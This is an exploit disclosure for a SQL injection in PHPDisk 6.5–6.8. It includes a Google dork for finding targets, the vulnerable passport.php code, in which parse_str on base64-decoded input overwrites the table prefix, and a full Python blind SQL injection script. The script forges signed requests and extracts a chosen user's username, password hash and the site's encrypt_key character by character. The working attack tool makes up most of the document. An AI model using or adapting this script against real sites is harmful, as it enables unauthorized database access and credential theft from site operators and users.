Phpdisk SQL Injection Vulnerabilities

摘要

# Title: Phpdisk SQL Injection Vulnerabilities
# Google Dork: Powered by phpdisk.com
# Date: 2013-8-5
# Exploit Author: Yaseng [at] c0deplay.com
# Vendor Homepage: http://www.phpdisk.com/
# Software Link: http://bbs.phpdisk.com/thread-4667-1-1.html
# Source Link : http://yaseng.me/phpdisk-sql-injection.html
# Version: 6.5- 6.8

# Title: Phpdisk SQL Injection Vulnerabilities
# Google Dork: Powered by phpdisk.com
# Date: 2013-8-5
# Exploit Author: Yaseng [at] c0deplay.com
# Vendor Homepage: http://www.phpdisk.com/
# Software Link: http://bbs.phpdisk.com/thread-4667-1-1.html
# Source Link : http://yaseng.me/phpdisk-sql-injection.html
# Version: 6.5- 6.8

1:Vulnerability detail
[php]
file plugins/phpdisk_client/passport.php

$str = $_SERVER['QUERY_STRING'];

if($str){
parse_str(base64_decode($str)); //Cover all uninitialized variables
}else{
exit('Error Param');
}
..........

if($sign!=strtoupper(md5($action.$username.$password))){
exit('No data,Code:2!');
}

$username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username;

if($action=='passportlogin'){

$rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1"); //The variable $tpf is controlled [/php]

2.exploit
[php]
#===============================================================================
# Id :phpdisk.y
# Author:Yaseng
#===============================================================================
import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib

def cslogo():
print '''
___ ___ ____ ____ ____ __ __ _ _
/ __)/ _ /( _ /( ___)( _ /( ) /__/ ( // )
( (__( (_) ))(_) ))__) )___/ )(__ /(__)/ / /
/___)/___/(____/(____)(__) (____)(__)(__)(__)
Name:phpdisk bind sql injection exploit
Author:Yaseng [[email][email protected][/email]]
Usage:phpdisk.py site[url]www.yaseng.me[/url] id[1]
'''

# show message
def msg(text, type=0):
if type == 0:
str_def = "[*]"
elif type == 1:
str_def = "[+]"
else:
str_def = "[-]";
print str_def + text;

# get url data
def get_data(url):
try:
r = urllib2.urlopen(url, timeout=10)
return r.read()
except :
return 0
def b(url):
if get_data(url).find("ssport Err",0) != -1 :
return 0
return 1

def make_plyload(payload):
return target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())

def get_username():

msg("get username ...")
global pass_list
len=0
for i in range(40) :
if b(make_plyload("pd_users WHERE 1 and (SELECT LENGTH(username) from pd_users where userid=%d )= %d #" % (uid,i))):
len=i
msg("username length:%d" % len,1)
break
global key_list
key_list=['0','1','2','3','4','5','6','7','8','9']
key_list+=map(chr,range(97,123))
username=""
for i in range(len) :
for key in key_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(username,%d,1) from pd_users where userid=%d )=%s #" % (i+1,uid,t)))) :
msg("username [%d]:%s" % (i+1,key))
username+=key
break
msg("username:"+username,1)
return username

def get_password():

pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
password=""
for i in range(32) :
for key in pass_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(password,%d,1) from pd_users where userid=%d )= %s #" % (i+1,uid,t)))) :
msg("password [%d]:%s" % (i+1,key))
password+=key
break
msg("username:"+password,1)
return password

def get_encrypt_key():

msg("get encrypt_key ...")
global pass_list
pass_list=map(chr,range(97,123))
len=0
for i in range(40) :
if b(make_plyload("pd_users WHERE 1 and ( SELECT LENGTH(value) from pd_settings where vars=0x656e63727970745f6b6579 )=%d #23" % i)):
len=i
msg("encrypt_key length:%d" % len,1)
break
global key_list
key_list=['0','1','2','3','4','5','6','7','8','9']
key_list+=map(chr,range(65,91)+range(97,123))
encrypt_key=""
for i in range(len) :
for key in key_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and ( SELECT binary(substr(value,%d,1)) from pd_settings where vars=0x656e63727970745f6b6579 ) = %s #" % (i+1,t)))) :
msg("key [%d]:%s" % (i+1,key))
encrypt_key+=key
break
msg("encrypt_key:"+encrypt_key,1)
return encrypt_key

if __name__ == '__main__':

cslogo()
if len(sys.argv) > 1 :
site=sys.argv[1];
global target
global uid
try :
uid=int(sys.argv[2]);
except :
uid =1
target=site+"/plugins/phpdisk_client/passport.php"
msg("exploit:"+site)
#print get_data(make_plyload(" pd_users WHERE 1 and ( SELECT substr(value,2,1) from pd_settings where vars=0x656e63727970745f6b6579 ) = 9 %23"))
if get_data(target) :
username=get_username()
if len(username) > 0 :
password=get_password()
if len(password) == 32 :
msg("Succeed: username:%s password:%s" % (username,password),1)
else :
msg("vulnerability not exits",2);
exit();[/php]